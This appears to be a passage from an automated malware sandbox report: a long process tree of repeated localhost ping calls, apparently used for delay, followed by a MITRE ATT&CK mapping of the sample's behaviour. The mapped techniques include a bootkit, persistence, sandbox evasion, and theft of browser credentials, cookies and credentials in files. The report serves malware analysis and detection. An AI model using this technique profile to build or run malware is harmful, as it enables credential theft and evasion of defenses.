- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6192
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13044
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6252
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13156
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1372
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:6412
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13416
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3216
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:852
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5956
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6248
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13132
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13224
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13264
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6348
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7152
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6788
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13496
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13424
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5844
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:468
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7248
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7364
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7416
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:7496
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7552
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7616
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7680
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:7728
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7796
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7880
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7928
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7980
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8036
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8104
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8156
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3376
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8236
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8292
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8328
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8384
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8460
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8520
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8564
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8632
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8692
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8744
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8808
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8852
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8908
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8976
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9104
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9160
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9212
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9280
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9332
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9388
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9444
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9496
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9560
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9600
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9688
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9832
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9752
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9876
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9928
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10108
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10172
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10228
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10264
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10320
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10372
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10468
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10556
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10628
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10676
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10712
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10760
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10800
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10856
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:10928
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11000
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11080
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11196
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11256
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6136
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11320
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11396
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11488
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11540
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11776
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12000
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12068
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13704
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12152
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12192
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:12232
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12276
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4188
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12340
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12376
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12420
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12480
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12528
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12572
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12644
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12684
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12744
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12792
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12840
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12880
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:12928
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:2320
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12976
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6156
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13068
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13160
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6288
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2316
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6264
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13316
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:13368
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13504
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13700
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:4756
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4732
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4892
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:4084
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:13960
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13980
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13996
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:14024
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:14096
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13876
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:14036
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13660
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14128
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:14248
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13832
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:14296
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:14184
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14212
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:14308
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14144
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6476
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6600
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6444
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6668
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6712
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6776
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:2056
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:3772
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:768
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2216
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6968
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7008
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7048
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7128
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:4796
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2364
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:7236
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:7184
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7320
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5484
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4472
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4036
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7588
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7660
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7432
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7524
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3996
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7860
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7944
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8008
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8092
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8180
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13924
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1096
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5096
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8224
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8316
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1872
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8464
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8524
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8588
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8680
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8752
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8804
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8880
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9020
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9108
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9352
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9596
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9696
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9744
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9760
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:9884
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:540
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10008
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10076
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:1664
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10148
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5680
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10304
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10336
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10420
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10540

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Safe Mode Boot

T1562.009

Modify Authentication Process

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion